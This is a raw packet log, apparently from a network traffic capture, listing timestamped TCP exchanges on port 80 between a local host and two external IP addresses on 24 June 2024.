Jun 24, 2024 00:10:21.578821898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578833103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578864098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.578883886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.578905106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578915119 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578926086 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578938007 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578958035 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.578982115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.578982115 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579024076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579066992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579077959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579088926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579102039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579108953 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579113007 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579135895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579169989 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579169989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579210043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579221964 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579262972 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579344034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579355001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579365015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579387903 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579421043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579423904 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579432964 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579443932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579453945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579493999 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579531908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579543114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579552889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579562902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579574108 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579610109 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579633951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579644918 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579655886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579673052 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579709053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579710007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579751968 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579767942 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579778910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579788923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579811096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579832077 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579900980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579910994 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579921961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579932928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579945087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579947948 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579956055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.579967022 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.579993963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580033064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580044985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580074072 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580108881 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580117941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580127001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580136061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580147028 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580152988 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580158949 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580163956 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580193043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580240011 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580348015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580358982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580364943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580374002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580384970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580394983 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580405951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580416918 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580420971 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580470085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580558062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580569029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580579042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580611944 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580656052 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580688000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580698967 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580710888 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580727100 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580729008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580740929 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580753088 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580760002 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580764055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580806971 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580851078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580861092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580888033 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580909014 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.580967903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580977917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.580987930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581000090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581005096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581011057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581022024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581028938 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581032991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581073999 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581120014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581130981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581140995 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581156969 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581160069 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581181049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581219912 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581259012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581269026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581279993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581290007 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581300974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581302881 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581314087 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581324100 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581362963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581372023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581382036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581392050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581412077 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581445932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581542015 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581552029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581562996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581573009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581579924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581584930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581594944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581605911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581617117 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581623077 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581629038 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581640005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581659079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581681967 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.581712008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.581753969 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.618079901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618099928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618110895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618128061 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.618155956 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.618160963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618170977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618207932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.618237972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618248940 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618257999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.618292093 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.626806021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626842022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626851082 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.626852036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626884937 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.626908064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.626921892 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626933098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626944065 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626955986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.626970053 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.626992941 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627013922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627038956 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627057076 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627120972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627121925 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627131939 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627142906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627152920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627159119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627182007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627217054 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627221107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627232075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627243042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.627260923 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.627285957 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.647130966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647154093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647165060 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647224903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647226095 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647227049 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647236109 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647317886 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647317886 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647332907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647373915 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647377014 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647387028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647398949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647414923 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647428036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647437096 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647484064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647486925 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647497892 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647510052 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647531986 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647562981 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647593021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647603989 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647614956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647650003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647680998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647705078 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647715092 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647725105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647736073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647746086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647757053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.647764921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.647806883 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655302048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655312061 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655323029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655365944 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655392885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655402899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655407906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655414104 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655447960 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655478001 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655494928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655504942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655514002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655544996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655571938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655575991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655586958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655632019 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655683041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655693054 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655702114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655710936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655738115 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655770063 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655821085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655873060 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655881882 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655894041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655903101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655913115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655921936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655930996 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.655936003 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655966997 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.655996084 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656033039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656043053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656052113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656063080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656071901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656092882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656125069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656193018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656203032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656213045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656222105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656232119 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656250000 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656286955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656286955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656379938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656404972 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656414032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656423092 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656434059 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656434059 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656444073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656454086 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656455994 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656466961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656476974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656492949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656502962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656536102 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656536102 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656570911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656791925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656801939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656812906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656842947 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656867981 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656893015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656903982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656913042 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656923056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656934023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656944990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656946898 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656955004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.656969070 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.656999111 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.657088041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657098055 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657107115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657113075 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657123089 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657130957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657145023 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.657181978 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.657284021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657294989 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657304049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657314062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657324076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657331944 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.657342911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.657377958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.657377958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663347960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663402081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663408041 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663410902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663422108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663474083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.663475037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663486004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.663522005 CEST	80	49726	185.172.128.116	192.168.2.5
